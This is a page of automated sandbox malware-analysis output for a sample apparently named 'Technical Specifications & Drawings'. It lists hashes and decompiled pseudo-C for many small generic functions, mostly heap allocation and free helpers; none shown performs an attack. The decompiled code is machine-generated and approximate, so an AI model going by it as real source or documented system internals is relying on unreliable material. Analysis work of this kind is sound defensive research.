                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d152edd70c11b13f41114d44a18f66bd784cf3742b353962b641d143fd264f0d
                                                  • Instruction ID: b6476f2d80d2a9b3373cb4652938f3aafd7d07c37505d15df1d1e0f408243d04
                                                  • Opcode Fuzzy Hash: d152edd70c11b13f41114d44a18f66bd784cf3742b353962b641d143fd264f0d
                                                  • Instruction Fuzzy Hash: 87F0BE32526E888FD7B3DB5CCA64B22B7D8AF007B8F545574E405C79A2C724EA40C740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DA44B Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017DA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1897b9c; // 0x0
				_t15 = __ecx;
				_t16 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E017EFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                  0x017da44b
                                                  0x017da453
                                                  0x017da472
                                                  0x017da476
                                                  0x00000000
                                                  0x017da493
                                                  0x017da47a
                                                  0x017da47f
                                                  0x017da486
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4be9a5462ad67150e2754001359a86f23ec250765e9d43eb950148fc4b71a887
                                                  • Instruction ID: 1e0a57038f09d8d737dbd4abb09aac35efd4b203a08a431fb57d6801d340e833
                                                  • Opcode Fuzzy Hash: 4be9a5462ad67150e2754001359a86f23ec250765e9d43eb950148fc4b71a887
                                                  • Instruction Fuzzy Hash: 73E09272A01421ABD2215A18EC04F66B3ADEBE5A51F0A4039E605D7218D628DE01C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AF358 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E017AF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E017DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L017C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                  0x017af35d
                                                  0x017af361
                                                  0x017af367
                                                  0x017af372
                                                  0x017af38c
                                                  0x017af38c
                                                  0x017af394

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction ID: 26cca80a1dddb980a303be3ae2565f68afe38ba24989d14ebec5231296a7b27a
                                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction Fuzzy Hash: CDE0D832A40118FBDB3196D99D05F5AFFBCDB94B61F050195FA04D7150D5609D00D2D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017BFF60 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017BFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x17811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E018788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E017C0050(_t14);
				}
			}










                                                  0x017bff66
                                                  0x017bff6b
                                                  0x00000000
                                                  0x017bff8f
                                                  0x00000000
                                                  0x017bff8f

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a59b1f1191e640d79d0b83f49bf95551500ec43530bffd033a6211a078973cde
                                                  • Instruction ID: 9dd16da5d28b3899e034e88d9f787a6799799138cd8b77aeb3388e61c445f750
                                                  • Opcode Fuzzy Hash: a59b1f1191e640d79d0b83f49bf95551500ec43530bffd033a6211a078973cde
                                                  • Instruction Fuzzy Hash: 91E0DFB0609204DFD735DB5AD8C4FA5FB98DB52F21F1AC05DE0088B102C721D881C28A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018341E8 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E018341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x18808f0);
				_t5 = E017FD08C(__ebx, __edi, __esi);
				if( *0x18987ec == 0) {
					E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x18987ec == 0) {
						 *0x18987f0 = 0x18987ec;
						 *0x18987ec = 0x18987ec;
						 *0x18987e8 = 0x18987e4;
						 *0x18987e4 = 0x18987e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01834248();
				}
				return E017FD0D1(_t5);
			}





                                                  0x018341e8
                                                  0x018341ea
                                                  0x018341ef
                                                  0x018341fb
                                                  0x01834206
                                                  0x0183420b
                                                  0x01834216
                                                  0x0183421d
                                                  0x01834222
                                                  0x0183422c
                                                  0x01834231
                                                  0x01834231
                                                  0x01834236
                                                  0x0183423d
                                                  0x0183423d
                                                  0x01834247

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec1fc38ab11a4d7b8de3e41b0f20fd0fd04af57d14dba870c99f5bdcedcc691e
                                                  • Instruction ID: 456dd0ff66ea21d7ec8e4cf768a57666162a69942f782a30251aa396258cfb67
                                                  • Opcode Fuzzy Hash: ec1fc38ab11a4d7b8de3e41b0f20fd0fd04af57d14dba870c99f5bdcedcc691e
                                                  • Instruction Fuzzy Hash: 97F0157482070AEFDBB0EFA9D50471C76A4F797310F08411A9204D73AAC73447A4CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0185D380 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0185D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L017AE8B0(__ecx, _a4, 0xfff);
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                  0x0185d38a
                                                  0x0185d39b
                                                  0x0185d3b1
                                                  0x00000000
                                                  0x0185d3b6
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction ID: 62717de8a49beda92b326f351f51cdb7988633b13f86d543c4adb74bab62b8a5
                                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction Fuzzy Hash: 39E0C231280209BBEB225E84CC04FA9BB16DB50BA0F104035FE089A691CA71DD91DAC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DA185 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017DA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x18967e4 >= 0xa) {
					if(_t5 < 0x1896800 || _t5 >= 0x1896900) {
						return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E017C0010(0x18967e0, _t5);
				}
			}





                                                  0x017da190
                                                  0x017da1a6
                                                  0x017da1c2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017da192
                                                  0x017da192
                                                  0x017da19f
                                                  0x017da19f

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c297163c6e54778ba739f6954f653c032354df86d1b1ffd21184e3af01ffd320
                                                  • Instruction ID: 8d5eaf99dee60ef40f596fdcc3d33a9a9ccdb24af240728deec4303a2c155617
                                                  • Opcode Fuzzy Hash: c297163c6e54778ba739f6954f653c032354df86d1b1ffd21184e3af01ffd320
                                                  • Instruction Fuzzy Hash: 72D02B7112000466CB2E13208918B257632F780B90F3C040CF3078B5A5FD50C9D89108
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D16E0 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017D16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E017D1710(0x18967e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L017C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                  0x017d16e8
                                                  0x017d16ef
                                                  0x017d16f3
                                                  0x017d16fe
                                                  0x00000000
                                                  0x017d1700
                                                  0x017d170d
                                                  0x017d170d
                                                  0x017d16f2
                                                  0x017d16f2
                                                  0x017d16f2
                                                  0x017d16f2

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5281b3ca040314207750c07514bd2ac9a725e3ec0a46cace369f47abdb63771f
                                                  • Instruction ID: 15d97fcf6c487d6eaf52f5d199de79aa8d4861f5f4dfeb2326dc17ed50af5d13
                                                  • Opcode Fuzzy Hash: 5281b3ca040314207750c07514bd2ac9a725e3ec0a46cace369f47abdb63771f
                                                  • Instruction Fuzzy Hash: 4BD0A771100101A2EE2D5B149818B146671EB90B91F78005CF307594D0DFA0CD92E058
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018253CA Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018253CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E017BEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                  0x018253ca
                                                  0x018253ce
                                                  0x018253d9
                                                  0x018253de
                                                  0x018253e1
                                                  0x018253e1
                                                  0x018253e6
                                                  0x018253f3
                                                  0x00000000
                                                  0x018253f8
                                                  0x018253fb

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction ID: 5b37c0c132277ce7404189d8a71e7aa281aebc2818eff13f5306321d05dcd0af
                                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction Fuzzy Hash: 46E08C319406849BCF13DB4CC698F8EBBF5FB45B00F140018A0089B660CA24EE00CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017BAAB0 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017BAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                  0x017baab6
                                                  0x017baabb
                                                  0x0180a442
                                                  0x00000000
                                                  0x0180a448
                                                  0x0180a454
                                                  0x0180a454
                                                  0x017baac1
                                                  0x017baac1
                                                  0x017baac6
                                                  0x017baac6

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction ID: 77bcff9ba47aa39a238c19410225a9e1235395cadb5e25ce8381d90db413fca1
                                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction Fuzzy Hash: 3ED0E939352E80CFD65BDB1DC995B5577A4BB44B44FC50490E501CB762E72CDA44CA10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D35A1 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017D35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E017BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                  0x017d35a1
                                                  0x017d35a1
                                                  0x017d35a5
                                                  0x017d35ab
                                                  0x017d35ab
                                                  0x017d35b5
                                                  0x00000000
                                                  0x017d35c1
                                                  0x017d35b7

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction ID: e957c45cadbd279c83b399fdf2bec5c4b3530351e0af9d061682aa6713c70971
                                                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction Fuzzy Hash: A3D0A77140118999DB01AF34C1187A8FF71BB00204FF810A5800705556C3354909C602
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017ADB40 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017ADB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L017C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                  0x017adb4d
                                                  0x017adb54
                                                  0x017adb5f
                                                  0x017adb56
                                                  0x017adb56
                                                  0x017adb5c
                                                  0x017adb5c

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction ID: cfabe858ea50d9a2ba0886de043d4dff5a8c640b730d9e6a182158a844ca0a6d
                                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction Fuzzy Hash: D7C08C30280A01AAEB321F20CD01B00BAA0BB50F01F8400A46302EA4F4DB78DC01E600
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0182A537 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0182A537(intOrPtr _a4, intOrPtr _a8) {

				return L017C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                  0x0182a553

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction ID: bfe3bf4ea64da32b18be4abbd9d707ef8e4bbdef4fdd75fceae83eda1a158a04
                                                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction Fuzzy Hash: 38C08C33080248BBCB126F81CC00F06BF2AFBA8B60F008018FA080B571C632E970EB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017C3A1C Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017C3A1C(intOrPtr _a4) {
				void* _t5;

				return L017C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                  0x017c3a35

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction ID: 392c09497660d3872487e655a05f05380ac8614e2c8ce572bf648c43721a4c45
                                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction Fuzzy Hash: DBC08C32080248BBC7226E41DC00F01BB29E7A0B60F000024B6040A5608532EC60D588
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AAD30 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017AAD30(intOrPtr _a4) {

				return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                  0x017aad49

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction ID: 3d99a1e52f6aeb91fad4f4f1581d94c96a6f594c3b7695a0b383364043bb927a
                                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction Fuzzy Hash: 28C08C32080248BBC7126A45CD04F01BB29E7A0B60F000024B6040A6618932E860D988
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B76E2 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017B76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                  0x017b76e4
                                                  0x00000000
                                                  0x017b76f8
                                                  0x017b76fd

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                  • Instruction ID: 0141ad9b126373acd7e2c9eb5146359efb69b041d6db10e769cb5318306f59fa
                                                  • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                  • Instruction Fuzzy Hash: 68C08C701411C45AEB2E570CCE68B20BA50AB48B0CF48019CAA010D4E2C368EC02D608
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D36CC Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017D36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                  0x017d36d2
                                                  0x017d36e8
                                                  0x017d36d4
                                                  0x017d36e5
                                                  0x017d36e5

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                  • Instruction ID: abfc8ab58e734cdc2c6f3b04fce50f2a970f702bea00281a59edf2136fd27567
                                                  • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                  • Instruction Fuzzy Hash: F2C02BB0150440FBD7251F30CD10F14F274F700F21F64035C7321554F4D5299C00D101
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017C7D50 Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017C7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                  0x017c7d56
                                                  0x017c7d5b
                                                  0x017c7d60
                                                  0x017c7d5d
                                                  0x017c7d5d
                                                  0x017c7d5d

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
